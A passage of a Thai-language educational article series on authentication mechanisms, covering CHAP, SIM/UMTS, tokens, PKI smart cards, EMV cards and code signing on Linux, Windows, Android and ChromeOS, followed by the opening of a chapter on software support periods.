แต่นำรหัสผ่านนั้นไปต่อกับค่าที่เซิร์ฟเวอร์สุ่มมาให้ เรียกว่าค่า challenge แล้วแฮชด้วย MD5 จากนั้นจึงส่งค่ากลับเซิร์ฟเวอร์ กระบวนการนี้ทำให้ระหว่างการรับรองตัวตน ไม่ต้องมีการส่งข้อความลับไปตรงๆ เลย และหากเซิร์ฟเวอร์ทำงานได้ถูกต้อง ข้อความ challenge ก็ควรเปลี่ยนไปทุกครั้ง ทำให้ข้อความที่ใช้รับรองตัวตนเปลี่ยนไปทุกครั้งเช่นกัน ข้อเสียของกระบวนการเช่นนี้คือเซิร์ฟเวอร์ต้องเก็บรหัสผ่านเอาไว้ในรูปแบบที่ย้อนกลับมาเป็นตัวรหัสผ่านได้ซึ่งมีข้อเสียในหลายกรณี เช่น ผู้ดูแลระบบสามารถเข้ามาดูรหัสผ่านได้ ### SIM รับรองด้วยความลับระหว่างกัน ขณะที่ CHAP ใช้เพื่อรับรองผู้ใช้ด้วยรหัสผ่าน ระบบโทรศัพท์มือถือเองก็มีกระบวนการรับรองตัว "ซิมการ์ด" ที่คล้ายกัน โดยซิมการ์ดนั้นจะมีค่าความลับเป็นตัวเลขขนาด 128 บิตอยู่ภายในเรียกว่า K<sub>i</sub> ตัวเลขนั้นไม่มีช่องทางอ่านออกมาได้ตามปกติ กระบวนการรับรองซิมการ์ดจะรับรองกับเซิร์ฟเวอร์ที่เรียกว่า authentication center (AuC) ที่จะเก็บค่าหมายเลข IMSI ที่ใช้ระบุตัวตนของซิมการ์ดทุกใบในโลก พร้อมกับค่า K<sub>i</sub> ด้วยเช่นกัน AuC จะส่งหมายเลขสุ่ม (nonce) ไปยังซิมการ์ดผ่านโทรศัพท์มือถือที่เสียบซิมอยู่ ซิมการ์ดจะนำค่าไปต่อกับค่า K<sub>i</sub> ในซิม แล้วแฮชออกมาด้วยฟังก์ชั่น COMP128 จากนั้นจึงคืนค่าแฮชที่ได้กลับไปยังเซิร์ฟเวอร์ ฝั่งเซิร์ฟเวอร์จะแฮชด้วยฟังก์ชั่นเดียวกันเพื่อเทียบว่าค่าตรงกันหรือไม่ หากตรงก็เป็นการรับรองว่าซิมที่ถูกต้องเชื่อมต่อกับโทรศัพท์อยู่จริง ในโลกความเป็นจริง COMP128 เวอร์ชั่นแรกกลับออกแบบมาอย่างหละหลวมและเป็นความลับไม่สามารถตรวจสอบจากภายนอกได้ แต่เมื่อโครงข่าย GSM ได้รับความนิยมสูงในเวลาไม่นาน นักวิจัยก็สามารถย้อนกลับฟังก์ชั่น COMP128 ได้สำเร็จ ส่งผลให้สามารถย้อนหาค่า K<sub>i</sub> ได้ด้วย ภายหลังจึงต้องปรับปรุงเป็น COMP128v2 จึงแก้ปัญหาไปได้ กระบวนการของ GSM ยังคงมีปัญหาสำคัญคือตัวซิมไม่สามารถตรวจสอบได้ว่ากำลังคุยกับเสาที่ถูกต้องจริงหรือไม่ ทำให้มีการโจมตีด้วยการตั้งเสาปลอม (rogue tower) ได้ เสา GSM ปลอมเหล่านี้อาจจะเป็นเสาที่ไม่เชื่อมต่อกับเครือข่ายใดๆ แต่มี AuC ปลอมๆ ที่ให้การรับรองซิมทุกตัวผ่านหมด หรืออาจจะเป็นการดักค่าตรงกลางเพื่อไปเชื่อมต่อก้บเครือข่าย GSM จริงๆ อีกทีหนึ่ง ทำให้เสาปลอมเหล่านี้สามารถดักฟังข้อความสนทนาได้ กระบวนการในระบบ UMTS ที่ได้รับการพัฒนาจาก GSM จึงมีการปรับปรุงให้ตัวซิมการ์ดเองต้องรับรองตัวตนของเสาสัญญาณด้วยเช่นกัน โดยตัวเสาจะส่งค่า AUTN มาพร้อมกับตัวเลขสุ่ม ภายในซิมการ์ดจะสามารถคำนวณค่า AUTN ได้จากเลขสุ่มที่ให้มา หากคำนวณค่าได้ไม่ตรง ตัวซิมจะไม่ยอมปล่อยค่าแฮชออกมาและยกเลิกการเชื่อมต่อ กระบวนการของ UMTS อาจจะเปรียบเทียบคล้ายกับกระบวนการของ MasterCard SecureCode ที่ทั้งสองฝั่งต้องรับรองตัวตนของกันและกัน ก่อนจะเริ่มดำเนินการใดๆ ต่อไป ### โทเค็นรับรองได้เพราะมีสิ่งรับรอง กระบวนการรับรองในกรณีที่เราไม่รู้จักกันมาก่อน ในชีวิตประจำวัน เรามักจะรับรองตัวตนกันด้วย "สิ่งรับรอง" หรือโทเค็น (token) โดยสิ่งรับรองเหล่านี้ต้องมีความสามารถที่จะรับรองได้ว่าผู้ที่ถือมันเป็นตัวตนที่อ้างมาจริง ในกรณีของไทยนั้นเราคงใช้บัตรประชาชนกันเป็นเรื่องปกติ เราเชื่อบัตรประชาชนเพราะโดยทั่วไปแล้วบัตรประชาชนนั้นปลอมได้ยากพอสมควร ฟิล์มใสที่เคลือบบัตรประชาชนนั้นเป็นพลาสติกแบบพิเศษที่พิมพ์ลายสะท้อนแสงเอาไว้ ลายเหล่านี้ปลอมได้ยาก แต่การตรวจสอบที่หละหลวม หลายครั้งธุรกรรมบางอย่างกลับไม่ได้ตรวจสอบอย่างดี และหลงเชื่อเพียงสำเนาที่ไม่ชัดเจนของบัตรประชาชนก็ทำให้การรับรองตัวตนผิดพลาดได้เรื่อยๆ สินค้าหลายชนิดรับรองว่าสินค้าเป็นของแท้ด้วยกระบวนการคล้ายๆ กัน ด้วยการติดสติกเกอร์สะท้อนแสงที่ปลอมแปลงได้ยาก โดยระบุหมายเลขประจำตัวสินค้าที่ตรงกับสินค้าที่ขาย ทำให้ลูกค้ารู้ได้ว่าสินค้าที่กำลังซื้อนั้นเป็นของแท้ ในระบบเซิร์ฟเวอร์ในองค์กรขนาดใหญ่ หรือกระทั่งเกมออนไลน์หลายๆ เกม มักมี "พวงกุญแจ" ที่เก็บค่าความลับเอาไว้ภายในชิปที่ยากต่อการอ่านค่าออกมา เราเรียกพวงกุญแจเหล่านี้ว่าฮาร์ดโทเค็น (hard token) โดยภายในเป็นนาฬิกาที่คำนวณค่า ขณะที่กูเกิลเลือกใช้ซอฟต์แวร์ที่ชื่อว่า Google Authenticator แล้วรับค่าที่เป็นความลับผ่านการอ่าน QR-code เมื่อตอนลงทะเบียนครั้งแรกเอาไว้ ซอฟต์แวร์แบบนี้เรียกว่าซอฟต์โทเค็น (soft token) มันจะทำให้ โทรศัพท์มือถือ (หรืออุปกรณ์อื่นๆ) กลายเป็นเครื่องรับรองตัวตนของเรา เมื่อเราล็อกอิน แทนที่จะบริการจะถามเพียงรหัสผ่าน ก็จะถามค่าที่ได้รับจากโทเค็นเหล่านี้เพิ่มเติม หากเราใส่ค่าจากโทเค็นได้ถูกต้องก็แสดงว่าเรา "มี" เครื่องรับรองตัวตนนี้อยู่กับตัว ### PKCS รับรองได้เพราะความลับอยู่กับเรา กระบวนการรับรองตัวตนที่ได้รับความนิยมสูงในระดับองค์กรอีกอย่างหนึ่งคือการรับรองตัวตนผ่านโครงสร้างพื้นฐานกุญแจสาธารณะ (public-key infrastructure - PKI) ปกติแล้วเมื่อเราพูดถึงกระบวนการรับรองตัวตนในมาตรฐาน SSL/TLS ที่เราใช้เข้าเว็บนั้นเรามักใช้เพื่อรับรองว่าเว็บที่เราเข้าชมอยู่นั้นเป็นเว็บจริง หลังจากนั้นเว็บจึงรับรองว่าเราเป็นใครด้วยการถามรหัสผ่านจากเราอีกครั้ง แต่กระบวนการ TLS นั้นมีระบุถึงกระบวนการรับรองผู้ใช้เอาไว้ด้วย โดยผู้ใช้จะต้องถือกุญแจลับและใบรับรองเอาไว้ การถือกุญแจลับและใบรับรองนั้นใบรับรองต้องถูกเซ็นลายเซ็นดิจิตอล (ซึ่งก็คือการเข้ารหัสค่าแฮชของไฟล์ด้วยกุญแจลับ) ด้วยหน่วยงานรับรอง (certification authority - CA) ที่เชื่อถือได้ สำหรับองค์กรทั่วไป ทางหน่วยงานอาจจะสร้าง CA ของตัวเองขึ้นมาใช้งาน หรืออาจจะใช้หน่วยงานภายนอกก็ได้ หากสร้าง CA ขึ้นมาใช้งานเอง ทางหน่วยงานก็มีหน้าที่ต้องกระจายใบรับรองของ CA ให้กับเครื่องคอมพิวเตอร์ทุกเครื่อง โดยต้องระวังว่าใบรับรองนี้จะไม่ถูกปลอมแปลงในระหว่างทาง สำหรับกุญแจลับและใบรับรองของผู้ใช้ทั่วไป มีทางเลือกสองแบบคือการแจกจ่ายออกไปเป็นไฟล์ ที่เรียกมาตรฐานว่า PKCS#12 ไฟล์นี้จะเป็นไฟล์รวมทั้งใบรับรองตัวตนดิจิตอลไว้พร้อมกับกุญแจลับ เมื่อเซิร์ฟเวอร์ต้องการรับรองตัวตนของผู้ใช้ที่เชื่อมต่อเข้ามา เซิร์ฟเวอร์สามารถร้องขอใบรับรองซึ่งจะมีกุญแจสาธารณะติดมาด้วย จากนั้นจึงเข้ารหัสตัวเลขชุดหนึ่งแล้วส่งกลับไปยังผู้ใช้ ผู้ใช้ที่มีกุญแจลับจะสามารถถอดรหัสค่าที่เข้ารหัสมาแล้วส่งกลับไปยังเซิร์ฟเวอร์ได้ เซิร์ฟเวอร์รู้ว่าผู้ใช้เป็นตัวจริงเพราะผู้ใช้ "มี" กุญแจลับของใบรับรองที่ได้รับการรับรองโดยหน่วยงานออกใบรับรอง หลายหน่วยงานไม่นิยมการออกใบรับรองและกุญแจลับให้เป็นไฟล์ เพราะสามารถทำสำเนาได้โดยง่าย ทางเลือกที่เราเห็นได้บ่อยคือการใช้สมาร์ตการ์ด กรณีนี้แทนที่ผู้ใช้จะถือไฟล์ของกุญแจลับโดยตรงและสามารถเปิดกุญแจขึ้นมาอ่านค่าได้ หน่วยงานออกใบรับรองจะให้สมาร์ตการ์ดกับผู้ใช้ไปหนึ่งใบ ภายในสมาร์ตการ์ดนั้นจะมีกุญแจลับอยู่ภายในแต่กลับไม่สามารถอ่านค่าออกมาได้ แต่จะมี API ขอให้สมาร์ตการ์ดเข้ารหัสและถอดรหัสข้อมูลที่ส่งเข้าไปแทน API ของการเรียกใช้สมาร์ตการ์ดเพื่อการรับรองตัวตนนี้มีมาตรฐานเรียกว่า PKCS#11 ปัจจุบันมีฮาร์ดแวร์หลากหลายรูปแบบ บางครั้งเป็นสมาร์ตการ์ดแบบเดียวกับบัตรประชาชนที่เราเห็นกัน แต่บางครั้งก็เป็น USB รูปร่างคล้ายแฟลชไดร์ฟสามารถเสียบเครื่องที่ไม่มีเครื่องอ่านสมาร์ตการ์ดได้ทันที กระบวนการของความลับใน PKCS#11 นี้มีความพิเศษคือกุญแจลับเองก็เป็นความลับต่อผู้ใช้ที่ถือกุญแจลับเองด้วย กระบวนการรับรองตัวตนจึงน่าเชื่อถือขึ้นอีกขั้นหนึ่งเพราะโดยทั่วไปแล้วผู้ใช้เองก็ไม่สามารถทำสำเนาโทเค็นไปได้ กระบวนการนี้รับประกันว่าโทเค็นจะมีเพียงชิ้นเดียว ### บัตรเครดิต เริ่มต้นความปลอดภัยด้วยการ "มอง" กระบวนการรับรองการจ่ายเงินอีกรูปแบบหนึ่งคือการรับรองการจ่ายเงินผ่านบัตรเครดิต บัตรเครดิตยุคแรกนั้นเป็นบัตรนูนแสดงตัวเลขบัตร, วันที่ออกบัตรและวันหมดอายุ, และชื่อผู้ถือบัตร กระบวนการรับรองการจ่ายเงินคือเจ้าของร้านจะต้องตรวจสอบบัตรว่าเป็นบัตรจริง ด้วยการตรวจสอบลายสะท้อนแสงบนตัวบัตร จากนั้นจึงนำบัตรไปรูดบนกระดาษคาร์บอนเพื่อเก็บข้อมูลบนตัวบัตรออกมา ปัญหาของกระบวนการเช่นนี้ คือ กระบวนการตรวจสอบอาศัยความซื่อสัตย์และความเชี่ยวชาญของร้านค้า หลายครั้งที่ร้านค้าไม่มีความเชี่ยวชาญในการตรวจสอบบัตรเครดิต ทำให้หลงรับบัตรปลอม และบางครั้งร้านค้าก็ร่วมมือกับกลุ่มฉ้อโกงเสียเอง กลุ่มเหล่านี้ผลิตบัตรที่ไม่มีการรับรองความถูกต้องใดๆ แต่มีเพียงตัวนูนเป็นตัวเลขและข้อมูลปลอมเท่านั้น เรียกว่า white card กระบวนการรับรองว่ามีการใช้บัตรจริงเพื่อสั่งจ่ายเงินมีเพิ่มเติมมาเรื่อยๆ เช่น การเพิ่มหมายเลข CVV (card verification number) ในสมัยหนึ่งมีการเพิ่มเลขนี้ไว้ในแถบแม่เหล็ก ทำให้อ่านจากภายนอกไม่เห็น (ในสมัยนั้นเครื่องอ่านบัตรยังมีราคาแพงและหาไม่ได้ทั่วไป) โดยตัวเลขต้องได้จากการรูดแถบแม่เหล็กเท่านั้น (บางรายเรียกว่า CVV1) แต่ก็ไม่ประสบความสำเร็จนักเพราะเครื่องอ่านบัตรสามารถทำได้จากอุปกรณ์ที่หาได้ทั่วไปหากผู้ต้องการอ่านบัตรมีความรู้พอ ตัวเลขอีกชุดหนึ่งคือ CVV หลังบัตรที่มีตัวเลขสามหลักเพิ่มเติมเพื่อรับรองว่ามีบัตรจริงด้วยการดูหมายเลขบัตรด้านหลัง แม้จะดูไม่มีประโยชน์นักเพราะผู้ปลอมบัตรต้องการเพียงแค่เห็นบัตรสักครั้งก็สามารถปลอมแปลงได้แล้ว แต่ CVV หลังบัตรออกแบบเพื่อการใช้งานผ่านอินเทอร์เน็ตเป็นหลัก โดยมาตรฐานการจัดเก็บข้อมูลระบุไม่ให้เว็บไซต์ของผู้ค้าเก็บหมายเลข CVV นี้เอาไว้ในฐานข้อมูล ดังนั้นแม้ข้อมูลหมายเลขบัตรจะหลุดไป แฮกเกอร์ก็ไม่สามารถใช้งานหมายเลขบัตรเครดิตได้ ปัญหาคือในการใช้งานจริง ธนาคารผู้ออกบัตรหลายรายไม่ใช้หมายเลข CVV นี้ และผู้ค้าหลายรายก็ไม่ใช้งานหมายเลข CVV ด้วยเช่นกัน ปัญหาการฉ้อโกงบัตรเครดิตสร้างปัญหาเรื่อยมา แต่ทุกวันนี้บัตรส่วนมากเป็นบัตรแบบมีชิปภายใน บัตรมีชิปที่ธนาคารออกให้เหล่านี้มักเป็นไปตามมาตรฐาน EMV (ตามชื่อบริษัท Europay, MasterCard, และ Visa ที่ร่วมสร้างมาตรฐาน) [กระบวนเข้ารหัสทำให้ EMV ได้เปรียบกระบวนการรับรองบัตรแบบเดิมๆ](http://www.isg.rhul.ac.uk/~psai074/slides/CT-RSA_12.pdf) มาก ([อ่านเพิ่มเติม](http://www.cs.ru.nl/E.Poll/papers/emv.pdf)) ส่วนประกอบสำคัญในบัตร EMV คือ คู่กุญแจสาธารณะและกุญแจลับที่อยู่ในตัวบัตร ส่วนธนาคารผู้ออกบัตรนั้นต้องมีกุญแจสาธารณะของตัวเองอีกชุดหนึ่ง กระบวนการเพิ่มเติมของมาตรฐาน EMV มีสามขั้นตอนหลัก - **รับรองว่าเป็นบัตรจริง**: ด้วยการขออ่านบัตรว่าข้อมูลได้รับการรับรองจากธนาคารผู้ออกบัตรหรือไม่ เครื่องรับจ่ายจะมีกุญแจสาธารณะของธนาคาร ตัวบัตรจะส่งข้อมูลบัตรพร้อมกุญแจสาธารณะของตัวบัตรออกมาให้เครื่องอ่านเป็นไฟล์ที่มีลายเซ็นดิจิตอลของธนาคารผู้ออกบัตรรับรองอยู่ จากนั้นเครื่องอ่านบัตรจะส่งค่ากลับเข้ามาเป็นตัวเลข nonce เพื่อให้ตัวบัตรเซ็นด้วยกุญแจลับของตัวบัตรเอง หากลายเซ็นดิจิตอลที่คืนออกมาสามารถตรวจสอบด้วยกุญแจสาธารณะที่ธนาคารผู้ออกบัตรรับรองก็แสดงว่าเป็นบัตรจริง - **รับรองผู้ถือบัตร**: กระบวนการนี้บ้านเราไม่เห็นกันมากนัก แต่หลายธนาคารในต่างประเทศจะให้ผู้ใช้ใส่รหัสผ่าน หรือเซ็นลายเซ็นในเครื่องเพื่อรับรองการจ่ายเงิน - **รับรองการจ่ายเงิน**: มีทั้งแบบออนไลน์และออฟไลน์ โดยแบบออฟไลน์ตัวเครื่องจะส่งข้อมูลการจ่ายเงินเข้าไปในตัวบัตร ตัวบัตรจะเซ็นด้วยกุญแจลับให้เครื่องจ่ายไปเก็บไว้ ส่วนแบบออนไลน์ตัวบัตรจะส่งข้อมูลขอรับรองการจ่ายเงินไปยังธนาคารผู้ออกบัตร ธนาคารผู้ออกบัตรจะส่งใบรับรองการจ่ายเงินกลับมา กระบวนการ EMV มีกระบวนการที่ซับซ้อนและตัวเลือกให้ใช้งานต่างกันไปตามแต่ธนาคารในแต่ละประเทศอีกมาก ในบทความนี้จะพูดคร่าวๆ เพียงเท่านี้ ### Software Authentication รับรองว่ารันของจริง กระบวนการหนึ่งที่เราไม่ค่อยรู้ตัวนัก คือ ซอฟต์แวร์ทุกวันนี้มีกระบวนการรับรองตัวตนของผู้ผลิตเพื่อลดความเสี่ยง ให้เรารับรู้ได้ว่าซอฟต์แวร์ที่เรากำลังติดตั้งในเครื่องนั้นเป็นซอฟต์แวร์ที่มาจากผู้ผลิตจริง โดยที่เราไม่รู้ตัว กระบวนการรับรองตัวตนผู้ผลิตของซอฟต์แวร์กลายเป็นกุญแจสำคัญของการรักษาความปลอดภัยคอมพิวเตอร์ ### ลินุกซ์: เชื่อใจที่มา กระบวนการติดตั้งซอฟต์แวร์ของลินุกซ์มักจะต่างจากวินโดวส์ เนื่องจากซอฟต์แวร์มักถูกติดตั้งจาก repository ที่มีซอฟต์แวร์จำนวนมากอยู่ด้วยกัน เพราะซอฟต์แวร์ส่วนใหญ่เองก็เป็นซอฟต์แวร์โอเพนซอร์สที่หาดาวน์โหลดได้ฟรี แต่แหล่งกระจายซอฟต์แวร์ของลินุกซ์นั้นมีมากมายทั่วโลก หลายที่ทำไว้เพื่อความสะดวกในการติดตั้งของคนในองค์กร บางที่ทำเพื่อให้บริการแก่สาธารณะ การเชื่อใจซอฟต์แวร์ที่จะมาติดตั้งจึงอาศัยกระบวนการเชื่อใจแหล่งที่มาของซอฟต์แวร์ ในกรณีนี้เราจะยก[ตัวอย่าง Debian](https://wiki.debian.org/SecureApt) ที่เป็นดิสโทรหนึ่งของลินุกซ์ กระบวนการทำงานคล้ายกับ Ubuntu แต่จะต่างไปจาก Redhat เล็กน้อย เมื่อเราติดตั้งลินุกซ์ จะมีกุญแจสาธารณะของผู้ผลิตอยู่ในเครื่องอยู่แล้ว โดยวางไว้ที่ `/etc/apt/trusted.gpg` เมื่อเราต้องการติดตั้งซอฟต์แวร์ เราไม่ต้องดาวน์โหลดจากเซิร์ฟเวอร์ของทาง Debian โดยตรงแต่สามารถดาวน์โหลดจากแหล่งอื่นที่เราสะดวกได้เสมอ รวมถึงการติดตั้งจากแผ่นซีดี ในแหล่งดาวน์โหลดจะต้องมีไฟล์ค่าแฮชไฟล์ที่เก็บค่าแฮชของไฟล์ติดตั้งและลายเซ็นดิจิตอลวางไว้คู่กับตัวไฟล์ติดตั้งเสมอ ตัวอย่างเช่น ใน [Debian 5.0 ที่ mirror1.ku.ac.th](http://mirror1.ku.ac.th/debian-archive/debian/dists/Debian-5.0/) จะมีไฟล์ Release.gpg เซ็นกำกับรายชื่อไฟล์ของแต่ละสถาปัตยกรรมเอาไว้ เมื่อเราต้องการดาวน์โหลดไฟล์จากสถาปัตยกรรม i386 ระบบปฏิบัติการจะดาวน์โหลดไฟล์ [Contents-i386.gz](http://mirror1.ku.ac.th/debian-archive/debian/dists/Debian-5.0/Contents-i386.gz) ซึ่งจะมีค่าแฮชของไฟล์ [Packages.gz](http://mirror1.ku.ac.th/debian-archive/debian/dists/Debian-5.0/main/binary-i386/) อีกครั้ง โดยในไฟล์นี้จะมีค่าแฮชของไฟล์ติดตั้งทุกไฟล์เอาไว้ในตัว การเก็บค่าแฮชเป็นลูกโซ่เช่นนี้ทำให้ไฟล์รับรองเพียงไฟล์เดียวสามารถรับรองไฟล์ติดตั้งทุกไฟล์ของระบบได้ ### วินโดวส์: รับรองชื่อผู้ผลิต กระบวนการรับรองชื่อผู้ผลิตของวินโดวส์นั้นต่างออกไป เนื่องจากเรามักดาวน์โหลดซอฟต์แวร์จากผู้ผลิตโดยตรงแทนที่จะมีแหล่งรวมตรงกลาง กระบวนการของวินโดวส์จึงเปิดให้มีการตรวจสอบได้แม้ผู้ผลิตจะไม่ได้เกี่ยวข้องกับไมโครซอฟท์โดยตรง ผู้ผลิตที่ต้องการเซ็นรับรองตัวตนในซอฟต์แวร์จะต้องติดต่อหน่วยงานออกใบรับรองรูปแบบเดียวกับใบรับรองดิจิตอลให้กับตนเอง กระบวนการตรวจสอบตัวตนของหน่วยงานออกใบรับรองของแต่ละที่ก็จะต่างกันไปตั้งแต่การส่งอีเมลรับรอง ไปจนถึงการขอเอกสารเป็นทางการ หลังจากนั้นเมื่อติดตั้งซอฟต์แวร์ ตัวติดตั้งของ[ไมโครซอฟท์จะแสดงชื่อผู้ผลิตขึ้นมาให้ผู้ใช้รับรู้ว่ากำลังติดตั้งจากผู้ผลิตรายใด](http://msdn.microsoft.com/en-us/library/windows/hardware/ff552246%28v=vs.85%29.aspx) โดยยกเว้นในบางกรณีของผู้ผลิตที่ได้รับรองจากหน่วยงานรับรองของไมโครซอฟท์เอง (Windows signing authority) หรือผู้ผลิตที่อยู่ในรายชื่อที่ได้รับความเชื่อถือ (trusted publisher) ก็จะติดตั้งได้เลย นอกจากนี้ยังมีผู้ผลิตที่อยู่ในรายชื่อ "ไม่น่าเชื่อถือ" ที่วินโดวส์จะไม่ยอมติดตั้งเลยโดยไม่ถามผู้ใช้แต่จะล็อกความพยายามติดตั้งจากผู้ผลิตเหล่านี้เอาไว้ในระบบแทน ### Android: ขอให้เหมือนเดิม กระบวนการรับรองซอฟต์แวร์ในระบบปฎิบัติการสมัยใหม่อย่างแอนดรอยด์เลือกใช้เส้นทางที่ต่างออกไป เพราะการทำงานของของระบบปฎิบัติการเองก็ต่างออกไป ด้วยการจำกัดสิทธิ์ซอฟต์แวร์ได้ละเอียดกว่าลินุกซ์และวินโดวส์ การรับรองตัวตนของผู้ผลิตซอฟต์แวร์ในแอนดรอยด์มีเหตุผลสำคัญคือการอัพเดตซอฟต์แวร์ เนื่องจากแอนดรอยด์ต้องการให้ผู้ใช้สามารถอัพเดตซอฟต์แวร์ได้โดยง่ายผู้ใช้ไม่ต้องรับรู้เมื่อมีการอัพเดตแต่ละครั้ง แต่หากซอฟต์แวร์รุ่นใหม่กลับเป็นซอฟต์แวร์จากผู้ผลิตอื่นที่ปลอมตัวมาก็อาจจะสร้างความเสียหายได้ [การรับรองตัวตนผู้ผลิตซอฟต์แวร์ของแอนดรอยด์](http://developer.android.com/tools/publishing/app-signing.html)จึงต้องการเพียงใบรับรองที่รับรองตัวเอง (self-signing certificate) เมื่อติดตั้งซอฟต์แวร์ลงในเครื่องครั้งแรก แอนดรอยด์จะจำใบรับรองไว้ และการอัพเดตทุกครั้งจะต้องใช้ใบรับรองเดิม ไม่เช่นนั้นจะติดตั้งไม่ได้ ด้วยแนวทางเช่นนี้ใบรับรองจะต้องมีอายุอย่างน้อย 25 ปี เพื่อให้แน่ใจว่าใบรับรองจะไม่หมดอายุเสียก่อนที่แอพพลิเคชั่นจะเลิกใช้งานไป นอกจากใบรับรองผู้ผลิตทั่วไปแล้ว แอนดรอยด์ยังใช้ใบรับรองพิเศษชุดหนึ่งที่วางไว้ในช่วงการคอมไพล์เพื่อใช้เป็นใบรับรองระบบ (system certificate) หากมีแอพพลิเคชั่นใดเซ็นด้วยใบรับรองเหล่านี้จะสามารถขอสิทธิพิเศษเพิ่มเติม เช่น การรีบูตเครื่อง, การติดตั้งและถอดแอพพลิเคชั่นโดยไม่ต้องแจ้งผู้ใช้ ฯลฯ ### ChromeOS: รับรองทุกครั้งที่บูต นอกจากกระบวนการรับรอง "แอพพลิเคชั่น" ที่เราพบทั่วไปแล้ว คอมพิวเตอร์สมัยใหม่แทบทั้งหมดจะมีกระบวนการรับรองซอฟต์แวร์แทบทุกขั้นตอน โดยผู้ผลิตฮาร์ดแวร์จะมีเฟิร์มแวร์ที่ฝังอยู่ในส่วนที่ดัดแปลงแก้ไขได้ยาก เช่น ฝังอยู่ในซีพียู จากนั้นเฟิร์มแวร์นี้รันโปรแกรมเพื่อรับรองเฟิร์มแวร์ภายนอกที่สามารถอัพเดตแก้ไขได้ สุดท้ายเฟิร์มแวร์จึงไปรับรองระบบปฎิบัติการในดิสก์อีกครั้ง คอมพิวเตอร์ยุคใหม่ในกลุ่มนี้ เช่น แอนดรอยด์เองก็มี bootloader ที่สามารถรับรองรอมที่จะมาติดตั้งได้ (ทำให้นักพัฒนาต้องการเครื่องแบบ unlocked bootloader) เครื่องเกมคอนโซลยุคใหม่ทั้งหมด ในสมัยเครื่อง Xbox รุ่นแรกนั้นเฟิร์มแวร์เริ่มต้นถูกฝังไว้ในชิป north bridge ที่เชื่อมต่อกับซีพียูด้วยบัส 700MHz โดยทางไมโครซอฟท์เชื่อว่าคนทั่วไปจะไม่สามารถดักฟังบัสความเร็วสูงเช่นนั้นได้ แต่นักวิจัยจากมหาวิทยาลัยก็สามารถดักฟังได้สำเร็จ และรอมเริ่มต้นการบูตก็หลุดออกมานำไปสู่การแฮก Xbox ในที่สุด (ดูเพิ่มเติมเรื่องระบบยืนยันเฟิร์มแวร์ของ Xbox ใน [GoogleTechTalk](http://www.youtube.com/watch?v=uxjpmc8ZIxM)) [กระบวนการรับรองซอฟต์แวร์ของ ChromeOS](http://www.chromium.org/chromium-os/chromiumos-design-docs/verified-boot) ระบุไว้ให้มีเฟิร์มแวร์สองชั้น ชั้นแรกจะอ่านได้อย่างเดียวและติดมากับผู้ผลิตโดยตรงเท่านั้น ภายในมีกุญแจสาธารณะของผู้ผลิตติดตั้งอยู่เพื่อทำหน้าที่รับรองเฟิร์มแวร์ชั้นต่อไป ในเฟิร์มแวร์ชั้นที่อ่าน/เขียนได้ จะต้องมีลายเซ็นดิจิตอลของผู้ผลิตอยู่ เฟิร์มแวร์ชั้นแรกจึงรับรองความถูกต้องได้ด้วยกุญแจสาธารณะ หากรับรองไม่สำเร็จ ระบบจะเตือนว่ามีการแก้ไขเฟิร์มแวร์แต่สามารถติดตั้งเฟิร์มแวร์ใหม่เพื่อใช้งานตามเดิมได้ เมื่อเฟิร์มแวร์รับรองสำเร็จจะเริ่มรัน เฟิร์มแวร์แบบอ่าน/เขียน เองจะมีกุญแจสาธารณะอื่นๆ (เช่น ของกูเกิล) เพื่อใช้รับรองเคอร์เนลในดิสก์ เมื่อรับรองสำเร็จแล้วก็จะถือว่าการบูตปลอดภัยดี กระบวนการตรวจสอบซอฟต์แวร์ก่อนบูตมีข้อจำกัดอยู่ เช่น ไม่สามารถตรวจสอบซอฟต์แวร์ที่รันไปแล้วได้ หากมีการแก้ไขเคอร์เนลหลังจากเริ่มรันไปแล้วก็จะต้องกลับบูตใหม่เพื่อตรวจสอบว่ามีการแก้ไขหรือไม่ ### ส่งท้าย กระบวนการยืนยันจากเดิมที่เคยเป็นการรับรองผู้ใช้กับระบบคอมพิวเตอร์ ทุกวันนี้ชิ้นส่วนต่างๆ ล้วนเป็นช่องทางให้ถูกโจมตีได้ทั้งสิ้น (สาเหตุหนึ่งก็เพราะช่องทางแฮกเดิมๆ ใช้งานไม่ได้แล้ว) การดัดแปลงซอฟต์แวร์และฮาร์ดแวร์เพื่อให้แฮกเกอร์บรรลุผลไม่ใช่เรื่องแปลกอีกต่อไป กระบวนการรับรองเหล่านี้สิ่งต่างๆ จึงแทรกซึมไปอยู่ในกระบวนการหลายอย่าง บทความนี้ไม่พูดถึงอีกสองส่วนได้แก่ การรับรองเว็บ ที่พูดถึงไปแล้วในบท [Asymmetric](https://www.blognone.com/node/45433) และ Biometric ที่พูดถึงในบท [Identification](https://www.blognone.com/node/51679)
# ซัพพอร์ต: กระบวนการดูแลความปลอดภัยตลอดอายุใช้งาน โปรแกรมเมอร์ที่มีประสบการณ์สักหน่อยคงเข้าใจได้ไม่ยากว่าซอฟต์แวร์ที่ไม่มีบั๊กนั้นแทบไม่มีจริงอยู่ในโลก หนังสือ Code Complete ของ [Steve McConnell](http://www.stevemcconnell.com/bio.htm) ระบุว่าโดยทั่วไปแล้วโค้ดทุกๆ 1000 บรรทัด (KLOC: kilo lines of code) จะมีข้อผิดพลาดประมาณ 15-50 จุด ซอฟต์แวร์ที่คุณภาพสูงมากๆ อาจจะมีกระบวนการตรวจสอบที่รัดกุม อาจจะทำให้คุณภาพซอฟต์แวร์ดีขึ้น จุดผิดพลาดต่ำลงต่ำ แต่ซอฟต์แวร์สมัยใหม่ที่มีความซับซ้อนสูง พึ่งพิงกับไลบรารีภายนอกจำนวนมาก แทบเป็นไปไม่ได้ที่จะอ้างว่าซอฟต์แวร์เหล่านี้ไม่มีความผิดพลาดอยู่เลย ในบางกรณีอาจมีผู้อ้างว่าทำได้เช่นในโครงการอวกาศบางโครงการ แต่ซอฟต์แวร์เหล่านั้นมักเป็นงานเฉพาะทาง ไม่ต้องรองรับฮาร์ดแวร์ที่หลากหมายและมาตรฐานการเชื่อมต่อกับภายนอกจำนวนมาก ### ระยะเวลาซัพพอร์ต การส่งมอบซอฟต์แวร์ที่ไร้ความผิดพลาดอาจจะเป็นไปได้ยาก การพัฒนาซอฟต์แวร์จึงมักจะมีช่วงที่ผู้ผลิตประกาศว่าจะ "ดูแล" ซอฟต์แวร์ของตัวเองต่อไปเมื่อมีปัญหา ช่วงเวลานี้เรียกว่าช่วงเวลาซัพพอร์ต (ซึ่งอาจจะสับสนกับการขอคำแนะนำสำหรับซอฟต์แวร์จริงๆ) ซอฟต์แวร์ที่มีผู้ใช้จำนวนมากส่งผลกระทบต่อผู้ใช้เป็นวงกว้าง 